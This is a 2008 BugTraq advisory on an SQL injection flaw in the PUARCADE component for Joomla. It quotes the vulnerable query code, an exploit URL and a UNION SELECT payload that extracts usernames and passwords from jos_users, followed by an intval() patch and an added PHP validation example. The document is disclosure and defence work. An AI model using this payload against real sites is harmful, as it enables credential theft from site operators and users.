BugTraq
Pu Arcade component for Joomla - SQL injection Apr 09 2008 09:20AM
netmantis com gmail com
I discovered a vulnerability in the PUARCADE component for Joomla (the latest version is vulnerable).

SQL injection vulnerability in puarcade.class.php <= V. 2.2, component for Joomla.

--------------------------------------------------------------------------------

Author : MantiS

---------

Vulnerable code :

------------------------

function warningByGame($gid) {
    global $database;

    $query = "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename FROM #__puarcade_games as g, #__puarcade_contentrating as c"
        . " WHERE g.contentratingid = c.id"
        . " AND g.id = $gid";

    $database->setQuery($query);
    $cont = $database->loadObjectList();

--------------------------

Exploit : http://website.com/joomla_path/index.php?option=com_puarcade&Itemid=1&gid=[SQL INJECTION]

---------

Can be exploited with a "0 UNION SELECT password,username,0,0,0 from jos_users--" (5 columns).

Patch :

--------

Place before "$query = "SELECT c.id......... " :

$gid = intval($_GET['gid']);

This forces the $gid variable to be converted to an integer.
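
An added example, not part of the original advisory or the component's code: the integer cast from the patch applied to the function's own parameter, together with a stricter validator that rejects a malformed gid instead of silently coercing it. parseGameId() and buildWarningQuery() are hypothetical names, the sample inputs are constructed, and PHP 5.2 or later is assumed for filter_var().

```php
<?php
// Added example (not from the advisory or the PUARCADE source).
// parseGameId() and buildWarningQuery() are hypothetical helper names.

/**
 * Strictly validate a game id taken from the request.
 * Returns a positive int, or null if the value is not a plain decimal integer.
 * intval() would turn "12 OR 1=1" into 12; this rejects the request instead,
 * which also makes probing attempts visible to logging.
 */
function parseGameId($raw)
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, array(
        'options' => array('min_range' => 1),
    ));
    return ($id === false) ? null : $id;
}

/**
 * Build the query quoted in the advisory with the id forced to an integer
 * at the point of use, so only digits can ever reach the SQL text.
 */
function buildWarningQuery($gid)
{
    $gid = (int) $gid; // same effect as intval($gid)
    return "SELECT c.id, c.name, c.description, c.warningrequired, c.imagename"
         . " FROM #__puarcade_games AS g, #__puarcade_contentrating AS c"
         . " WHERE g.contentratingid = c.id"
         . " AND g.id = " . $gid;
}

// Constructed sample inputs: one valid id and two malformed values.
$samples = array('12', '12 OR 1=1', 'abc');
foreach ($samples as $raw) {
    $id = parseGameId($raw);
    if ($id === null) {
        echo "rejected: " . var_export($raw, true) . "\n";
        continue;
    }
    echo buildWarningQuery($id) . "\n";
}
```

Casting the parameter inside the function, rather than re-reading $_GET['gid'], keeps the function safe for any caller, whatever the source of the id.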
